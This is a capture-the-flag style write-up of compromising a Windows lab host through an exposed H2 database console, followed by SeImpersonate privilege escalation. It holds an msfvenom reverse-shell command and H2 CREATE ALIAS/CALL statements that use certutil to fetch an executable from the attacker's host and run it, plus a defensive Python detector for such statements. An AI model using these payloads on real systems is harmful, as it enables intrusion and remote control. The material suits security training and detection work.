First enumeration with nmap

# Nmap 7.94SVN scan initiated Tue Feb 27 17:09:48 2024 as: nmap -sC -sV -T4 -oN service.nmap -p 80,135,139,445,5040,8082,9092 -Pn 192.168.154.66
Nmap scan report for 192.168.154.66
Host is up (0.63s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5040/tcp open  unknown
8082/tcp open  http          H2 database http console
|_http-title: H2 Console
9092/tcp open  XmlIpcRegSvc?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 37s
| smb2-time: 
|   date: 2024-02-27T16:13:15
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 27 17:12:58 2024 -- 1 IP address (1 host up) scanned in 189.71 seconds

Enumerating port 8082

From the nmap scan we notice an H2 Database service running on port 8082. Opening it in a browser, we get a login page.

Clicking the Connect button, we were able to log in.

Checking online, we found an exploit on Exploit-DB.

Following the exploitation steps, we can trigger RCE.

First, generate a reverse shell payload with msfvenom.

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/PGP/Jacko]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.187 LPORT=443 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -f http://192.168.45.187/reverse.exe C:\\Users\\Public\\shell.exe").getInputStream()).useDelimiter("\\Z").next()');

Upload the shell to the target.

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\Users\\Public\\shell.exe").getInputStream()).useDelimiter("\\Z").next()');

Trigger the shell.

Boom, we got a reverse shell.
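The CREATE ALIAS / CALL pair used above is exactly what a defender should be looking for in H2 statement logs. As an added example (not part of the original write-up), the Python below parses H2 SQL statements, flags any alias bound to a Java method outside an assumed allowlist or compiled from inline source, and reports calls to such aliases together with the OS command they run; the sample statements are the two from this write-up plus two constructed benign ones, and the allowlist entry com.example.Reports.total is hypothetical.

```python
import re

# Grammar of the H2 statement the exploit relies on: CREATE ALIAS binds a SQL
# function name to a static Java method (FOR "class.method") or to inline Java
# source (AS $$ ... $$); either form hands the DB user a code-execution primitive.
ALIAS_RE = re.compile(
    r'CREATE\s+(?:FORCE\s+)?ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?(\w+)\s+'
    r'(?:DETERMINISTIC\s+)?(?:FOR\s+["\']([^"\']+)["\']|AS\s+\$\$)', re.I)
CALL_RE = re.compile(r'CALL\s+(\w+)\s*\(', re.I)
# Pull the OS command string out of a Runtime.exec("...") / ProcessBuilder("...") call.
EXEC_RE = re.compile(r'(?:exec|ProcessBuilder)\(\s*"((?:[^"\\]|\\.)*)"')


def audit_statements(statements, allowed_targets=frozenset()):
    """Return (severity, reason, evidence) findings for a list of H2 SQL statements."""
    findings = []
    suspicious = {}  # alias name -> target; upper-cased as H2 stores unquoted identifiers
    for stmt in statements:
        m = ALIAS_RE.search(stmt)
        if m:
            name, target = m.group(1), m.group(2)
            if target is None:
                findings.append(("high", "alias compiled from inline Java source", name))
                suspicious[name.upper()] = "<inline source>"
            elif target not in allowed_targets:
                findings.append(("high", "alias bound to non-allowlisted Java method",
                                 f"{name} -> {target}"))
                suspicious[name.upper()] = target
            continue
        c = CALL_RE.search(stmt)
        if c and c.group(1).upper() in suspicious:
            cmd = EXEC_RE.search(stmt)
            evidence = cmd.group(1) if cmd else stmt[:80]
            findings.append(("critical", f"call to suspicious alias {c.group(1)}", evidence))
    return findings


# Constructed sample: the two statements from this write-up plus two benign ones.
SAMPLE = [
    "SELECT * FROM INFORMATION_SCHEMA.TABLES;",
    'CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";',
    r'''CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -f http://192.168.45.187/reverse.exe C:\\Users\\Public\\shell.exe").getInputStream()).useDelimiter("\\Z").next()');''',
    r'''CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\Users\\Public\\shell.exe").getInputStream()).useDelimiter("\\Z").next()');''',
    'CREATE ALIAS IF NOT EXISTS REPORT_TOTAL FOR "com.example.Reports.total";',  # hypothetical, allowlisted
]

if __name__ == "__main__":
    for sev, reason, evidence in audit_statements(SAMPLE, {"com.example.Reports.total"}):
        print(f"[{sev}] {reason}: {evidence}")
```

On the sample this reports the alias creation as high and both CALLs as critical, with the certutil download and the shell.exe launch as evidence, while the allowlisted alias is silent.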

Privilege Escalation

Running the whoami command was not working, so we uploaded a whoami.exe binary to the target.

Checking which privileges we have, we see that user tony has SeImpersonatePrivilege enabled, so let's run printspoofer.exe.

Upload printspoofer.exe.

printspoofer did not work, so we used godpotato.exe.

Spawned a cmd shell…

The cmd shell didn't work, so we uploaded net.exe. That didn't work either.

We uploaded the nc64.exe binary and used godpotato.exe to spawn a reverse shell with nc64.exe.

And we are through with it 🙂